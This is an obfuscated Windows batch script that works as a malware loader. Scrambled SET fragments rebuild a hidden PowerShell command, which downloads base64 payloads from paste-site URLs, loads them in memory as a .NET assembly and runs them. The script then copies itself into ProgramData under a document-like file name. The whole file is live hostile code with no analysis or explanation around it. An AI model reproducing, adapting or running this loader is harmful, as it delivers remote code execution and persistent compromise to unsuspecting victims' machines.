@echo off
GOTO FGGNOHUJJF
:GHGOGNIJIO
SET GDINIJDGOG=IAAkAHQAYQByAGcAZQB0AFQAeQBwAGUALgBHAGUAdABNAGUAdABoAG8AZAAoACcAcg
GOTO GOOIONSJOO
:NSGGFSSFSD
SET GOOGFDINDJ=UAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOg
GOTO JHFSSUGJFF
:NGFIODNNUK
SET JJNSOGJIIN=MAdABhAHIAdABQAG8AcwApACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAcwB0AGEAcgB0AFAAbwBzACAAKwA9ACA
GOTO UFOFGIUFIN7
:ONJIFSGNUS
SET IODGGFNNNG=0AEMAbwBuAHQAZQBuAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuA
GOTO NFIGFNOFFO
:GJOJKGFODN
SET IJOGDJHJOI=8AMwAwADAAMwAyADAAMgA2ACcALAAgACQAaQBuAGoAVgBhAGwAdQBlACwAIAAnADAAJwAsACAAJ
GOTO NOGDIONKIJ3
:FGIIDGOKON
SET OGFGJIUIIJ= "Start-Process %SYSTEMROOT%\System32\WindowsPowerShell\v1.0\powershell
GOTO NNNOFGOJSF
:FGIIDGOKON0
SET INGJNFODFN=HAGUAdAAtAFIAYQBuAGQAbwBtACAALQBJAG4AcAB1AHQATwBiAGoAZQBjAHQAIAAkA
GOTO FGIIDGOKON1
:FGIIDGOKON3
SET IGUJGSDDDO=yAGQAZQByACkAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdAByAHkAIAB7ACAAcgB
GOTO FGIIDGOKON4
:NOGDIONKIJ
SET JJGINGIFUD=G8AbgAgAEcAZQB0AC0AUgBlAG0AbwB0AGUARABhAHQAYQAgAHsADQAKACAAIAAgA
GOTO OJSDJOFDGD
:UFIOIGOFFS
SET GDIDFOHFNF=AYQByAGcAZQB0AFUAcgBsAHMADQAKAGkAZgAgACgAJAByAGEAdwBEAGEAdABhAC
GOTO NNNOFGOJSF6
:GGFFDGFGGF
SET HNOUUOIFOG=nAC4ATABlAG4AZwB0AGgAIAAtACAANwApAA0ACgAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAA
GOTO GHGOGNIJIO
:NJJNOFOGID
SET FGISDGDFID=YQBsAHUAZQAgAD0AIAAnAE0AcwBCAHUAaQBsAGQAJwANAAoAIAAgACAAIAAgACAAIAAgACQAcwB
GOTO IJOFOIOSIS
:NOGDIONKIJ7
SET ONNFGIGHNJ=ErrorAction SilentlyContinue"
GOTO NOGDIONKIJ8
:GGOOOGJFFD
SET OUDJIDFJNI=CkALAANAAoAIAAgACAAIAAoACQAYgBhAHMAZQBVAHIAbAAgACsAIAAnAGQAcABhAHMAdA
GOTO NNNOFGOJSF3
:GOUINIDKFD
SET HGDDINGDHG=8AYwByAGUAcwB1AGIAdQBoAHQAaQBnAC4AdwBhAHIALwAvADoAcwAgAGcAcwBmAGYAcwBmACcAIAA7ACAAJABnA
GOTO OSFJONOKJD
:NOGDIONKIJ1
SET INNDOJFUGF=AGIAagBlAGMAdABbAF0AXQAgACgAJABnAGcAIAAgACwAIAAkAHMAdAByACwAIAAnAGQAbwBjAF
GOTO GJOJKGFODN
:IINOGUFJFD
SET SNJJUNSUSO=cwAnACkADQAKACAAIAAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAkAGkAbgBqAFYA
GOTO NJJNOFOGID
:NOGDIONKIJ9

GOTO OJSDJOFDGD0
:GOGOJDUGGO
SET DDOFIGOIDI=CkADQAKACAAIAAgACAAJABzAHQAYQByAHQAVABhAGcAIAA9ACAAJwA8ADwAUwBUAEEAUgBUAD4APgAnA
GOTO UFOFGIUFIN0
:SNKGOKOKGG
SET GGFJIDOFDI=kAEEAcwBtAC4ARwBlAHQAVAB5AHAAZQAoACcAbQB5AHAAcgBvAGcAcgBhAG0ALgBIAG8AbQBlAGUA
GOTO IINOGUFJFD
:DJSODDGDGO
SET DNKGGGIDFF=0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAGUAbgBkAFAAbwBzACAALQBnAHQAIAAkAH
GOTO NGFIODNNUK
:UFOFGIUFIN
SET NOINOOOGON=AZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAA
GOTO ODJOJGGGDJ
:SIIGDDGKFG
SET HDJOFHUNNG=CgANAAoAIAAgACAAIAAgACAAIAAgACQAdABhAHIAZwBlAHQAVAB5AHAAZQAgAD0AIAAkAGwAbwBhAGQAZQB
GOTO SNKGOKOKGG
:JOFDGJNGJG
SET NDNJSJDFHG=C8AeABhAG0ALwA2ADIAMAAyAGkAaABjAGEAcwByAGUAdgAvAG0AbwBjAC4AdABuAGUAdABuAG
GOTO GOUINIDKFD
:JHFSSUGJFF
SET FGGSDSNGJO=BGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAGEAcwBlADYANABDAGgAdQBuAGsAKQANAAoAIA
GOTO ODGFKHOFNG
:NOGDIONKIJ6
SET JONFODFIJI=py-Item -Path '%~f0' -Destination 'C:\ProgramData\doc_30032026.bat' -Force -
GOTO NOGDIONKIJ7
:SNNKGFGHHN
SET NOGFFDOIGN=GIAcwB0AHIAaQBuAGcAKAAkAHMAdABhAHIAdABQAG8AcwAsACAAJABiAGEAcwBlADYANABMAGUAbg
GOTO GSFHIDNIIF
:GSIHNGDIII
SET GKDFNFGDDS=A6ADoATABvAGEAZAAoACQAYQBzAHMAZQBtAGIAbAB5AEIAeQB0AGUAcwApAA0A
GOTO SIIGDDGKFG
:NFIGFNOFFO
SET ISIUDJDFFI=GcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAByAGEAdwBEAGEAdABhA
GOTO GOGOJDUGGO
:NOGDIONKIJ8
%FDINFDGUDO%%OGFGJIUIIJ%%GNDOGJJOSH%%NOINOOOGON%%NDOGFIFFIF%%GNOOJFFIII%%JJGINGIFUD%%FNOONODFGI%%DJJSDNGUOO%%FDNOIUOHNN%%INGJNFODFN%%JSJOFFSDSK%%FGDGOGKHUD%%IGUJGSDDDO%%GFDGGIDNFD%%NFFDDJGFDS%%FFUGJNHGDG%%NFGIJOJNDO%%NIFFOJNIJH%%IGJHHNFFND%%ODUJDGGDGH%%FFHFJJOING%%OUDJIDFJNI%%NIDIGGNGKD%%SDSJGIGIFF%%GDIDFOHFNF%%JGOGFJIISD%%IODGGFNNNG%%ISIUDJDFFI%%DDOFIGOIDI%%SIDJFNFDJI%%ONGDDDODGD%%NNINGUDFFF%%OJDFNGINDS%%ISOGIJNHSJ%%DNKGGGIDFF%%JJNSOGJIIN%%FDGJHFGOFD%%SFOINNNSNG%%GGIIIGNGGF%%DNGFNGGIHS%%NOGFFDOIGN%%FDIJJDNODG%%GOOGFDINDJ%%FGGSDSNGJO%%HINKDDDFNF%%GGIJDGDSOG%%GKDFNFGDDS%%HDJOFHUNNG%%GGFJIDOFDI%%SNJJUNSUSO%%FGISDGDFID%%OIFIOIIIUF%%GOOGFNINUG%%NDNJSJDFHG%%HGDDINGDHG%%GINFFJNDJG%%HNOUUOIFOG%%GDINIJDGOG%%ODOOIDGNSF%%OGDGOGOFDI%%INNDOJFUGF%%IJOGDJHJOI%%DIJOSGJOIF%%FNJIOGFDOS%%SGGFNSGKKI%%JONFODFIJI%%ONNFGIGHNJ%
GOTO NOGDIONKIJ9
:FGIIDGOKON7
SET NFGIJOJNDO=CgB9AA0ACgAkAHMAYwBoAGUAbQBlADEAIAA9ACAAJwBoAHQAdABwACcADQAKACQAcwBjAGgAZQBtAG
GOTO FGIIDGOKON8
:UFOFGIUFIN9
SET GGIIIGNGGF=cwAgAC0AIAAkAHMAdABhAHIAdABQAG8AcwANAAoAIAAgACAAIAAgACAAIAAgACQ
GOTO NDGOIOGGOD
:NNNOFGOJSF
SET GNDOGJJOSH=.exe -WindowStyle Hidden -ArgumentList '-Command \"$jghjggghhjg = ''WwBOAGUAdAAuAFM
GOTO UFOFGIUFIN
:FGGNOHUJJF
SET FDINFDGUDO=%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\powershell.exe -Command
GOTO FGIIDGOKON
:NOGDIONKIJ3
SET DIJOSGJOIF=wB4ADgANgAnACkADQAKACAAIAAgACAAIAAgACAAIAApAA0ACgAgACAAIAAgAH0ADQAKAH0A'';$oWgjffux
GOTO NOGDIONKIJ4
:NOGDIONKIJ4
SET FNJIOGFDOS=d = [system.Text.encoding]::Unicode.GetString^([system.convert]::Fromba
GOTO NOGDIONKIJ5
:OSFJONOKJD
SET GINFFJNDJG=GcAIAA9ACAAJABnAGcALgBTAHUAYgBzAHQAcgBpAG4AZwAoADAALAAgACQAZwB
GOTO GGFFDGFGGF
:NOGDIONKIJ5
SET SGGFNSGKKI=se64string^( [regex]::replace^($jghjggghhjg, ''f@'',''f''^)^)^);iex $oWgjffuxd\"'";Co
GOTO NOGDIONKIJ6
:NINSSSGGGO
SET GOOGFNINUG=hAG8AbABwAHUANgAyADAAMgAzADAAOQAyAEMAVgAvAG4AaQBhAG0ALwBzAGQAYQBlAGgALwBzAGYAZQByA
GOTO JOFDGJNGJG
:NNNOFGOJSF1
SET FFHFJJOING=BhAHMAdABlAGIALgBpAG4ALwBpAGkANQBQAGYAQwB6ADgAMwBhAFQAYwBEAGcASwAnA
GOTO GGOOOGJFFD
:OJSDJOFDGD
SET FNOONODFGI=CAAcABhAHIAYQBtACAAKABbAHMAdAByAGkAbgBnAFsAXQBdACQAdQByAGwAcwApAA0ACgAgACAAIAAgAC
GOTO GIGKISIGDF
:FGIIDGOKON1
SET JSJOFFSDSK=HUAcgBsAHMAIAAtAEMAbwB1AG4AdAAgACQAdQByAGwAcwAuAEwAZQBuAGcAdABoAA0ACgAgACAAIAAgAGY
GOTO FGIIDGOKON2
:OKDJIGNING
SET FDNOIUOHNN=AYgBDAGwAaQBlAG4AdAANAAoAIAAgACAAIAAkAHIAYQBuAGQAbwBtAE8AcgBkAGUAcgAgAD0AIAB
GOTO FGIIDGOKON0
:DFOSOGKOGN
SET GGIJDGDSOG=AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQ
GOTO GSIHNGDIII
:FGIIDGOKON8
SET NIFFOJNIJH=UAMgAgAD0AIAAnAHMAOgAvAC8AJwANAAoAJABiAGEAcwBlAFUAcgBsACAAPQAg
GOTO FGIIDGOKON9
:NOGDIONKIJ0
SET OGDGOGOFDI=gACAAIAAgACAAIAAgACAAIAAkAG4AdQBsAGwALAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAWwBv
GOTO NOGDIONKIJ1
:NNNOFGOJSF4
SET SDSJGIGIFF=AoADQAKACQAcgBhAHcARABhAHQAYQAgAD0AIABHAGUAdAAtAFIAZQBtAG8AdABlAEQAYQB0AGEAIAAkAHQ
GOTO UFIOIGOFFS
:ODGFKHOFNG
SET HINKDDDFNF=AgACAAIAAgACAAIAAgACQAbABvAGEAZABlAGQAQQBzAG0AIAA9ACAAWwBTAHkAcwB0
GOTO DFOSOGKOGN
:NNNOFGOJSF0
SET ODUJDGGDGH=cAZQB0AFUAcgBsAHMAIAA9ACAAQAAoAA0ACgAgACAAIAAgACgAJABiAGEAcwBlAFUAcgBsACAAKwAgACcAaA
GOTO NNNOFGOJSF1
:IJOFOIOSIS
SET OIFIOIIIUF=0AHIAIAA9ACAAJwAxACcADQAKACAAIAAgACAAIAAgACAAIAAkAGcAZwAgAD0AIAAnAHQAeAB0AC4AZAB
GOTO NINSSSGGGO
:UFOFGIUFIN8
SET SFOINNNSNG=AIAAgACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAIAA9ACAAJABlAG4AZABQAG8A
GOTO UFOFGIUFIN9
:UFOFGIUFIN3
SET OJDFNGINDS=MAIAAgACAAPQAgACQAdABlAHgAdABDAG8AbgB0AGUAbgB0AC4ASQBuAGQAZQB4AE8AZgAoACQAZQBuAGQA
GOTO UFOFGIUFIN4
:FGIIDGOKON9
SET IGJHHNFFND=ACQAcwBjAGgAZQBtAGUAMQAgACsAIAAkAHMAYwBoAGUAbQBlADIADQAKAA0ACgAkAHQAYQByAG
GOTO NNNOFGOJSF0
:FGIIDGOKON5
SET NFFDDJGFDS=AAkAHUAKQAgAH0AIABjAGEAdABjAGgAIAB7ACAAYwBvAG4AdABpAG4AdQBlACA
GOTO FGIIDGOKON6
:GOOIONSJOO
SET ODOOIDGNSF=B1AG4AJwAgACsAIAAnAHMAcwAnACkALgBJAG4AdgBvAGsAZQAoAA0ACgAgACAAIAA
GOTO NOGDIONKIJ0
:FGIIDGOKON2
SET FGDGOGKHUD=AbwByAGUAYQBjAGgAIAAoACQAdQAgAGkAbgAgACQAcgBhAG4AZABvAG0ATwB
GOTO FGIIDGOKON3
:KDFKNUOOJN
SET GNOOJFFIII=AHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgANAAoADQAKAGYAdQBuAGMAdABpA
GOTO NOGDIONKIJ
:NNNOFGOJSF3
SET NIDIGGNGKD=BlAC4AYwBvAG0ALwAzAFYAWQA2ADkAUgBZADcASgAuAHQAeAB0ACcAKQANAAoAKQANA
GOTO NNNOFGOJSF4
:UFOFGIUFIN7
SET FDGJHFGOFD=AJABzAHQAYQByAHQAVABhAGcALgBMAGUAbgBnAHQAaAANAAoAIAAgACAAIAAgACA
GOTO UFOFGIUFIN8
:UFOFGIUFIN2
SET NNINGUDFFF=AAuAEkAbgBkAGUAeABPAGYAKAAkAHMAdABhAHIAdABUAGEAZwApAA0ACgAgACAAIAAgACQAZQBuAGQAUABvAH
GOTO UFOFGIUFIN3
:UFOFGIUFIN0
SET SIDJFNFDJI=A0ACgAgACAAIAAgACQAZQBuAGQAVABhAGcAIAAgACAAPQAgACcAPAA8AEUATgBEAD4APgAnAA0ACgANAAoAIAAg
GOTO UFOFGIUFIN1
:NNNOFGOJSF6
SET JGOGFJIISD=AALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsADQAKACAAIAAgACAAJAB0AGUAeAB
GOTO ONJIFSGNUS
:GSFHIDNIIF
SET FDIJJDNODG=BnAHQAaAApAA0ACgANAAoAIAAgACAAIAAgACAAIAAgACQAYQBzAHMAZQBtAGIAbAB5AEIAeQB0AG
GOTO NSGGFSSFSD
:FGIIDGOKON4
SET GFDGGIDNFD=lAHQAdQByAG4AIAAkAGMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAK
GOTO FGIIDGOKON5
:FGIIDGOKON6
SET FFUGJNHGDG=Af@QANAAoAIAAgACAAIAB9AA0ACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJABuAHUAbABsAA0A
GOTO FGIIDGOKON7
:GIGKISIGDF
SET DJJSDNGUOO=QAYwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGU
GOTO OKDJIGNING
:UFOFGIUFIN1
SET ONGDDDODGD=ACAAIAAkAHMAdABhAHIAdABQAG8AcwAgAD0AIAAkAHQAZQB4AHQAQwBvAG4AdABlAG4Ad
GOTO UFOFGIUFIN2
:UFOFGIUFIN4
SET ISOGIJNHSJ=VABhAGcAKQANAAoADQAKACAAIAAgACAAaQBmACAAKAAkAHMAdABhAHIAdABQAG8AcwAgAC
GOTO DJSODDGDGO
:NDGOIOGGOD
SET DNGFNGGIHS=AYgBhAHMAZQA2ADQAQwBoAHUAbgBrACAAPQAgACQAdABlAHgAdABDAG8AbgB0AGUAbgB0AC4AUwB1A
GOTO SNNKGFGHHN
:ODJOJGGGDJ
SET NDOGFIFFIF=cgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBv
GOTO KDFKNUOOJN
:OJSDJOFDGD0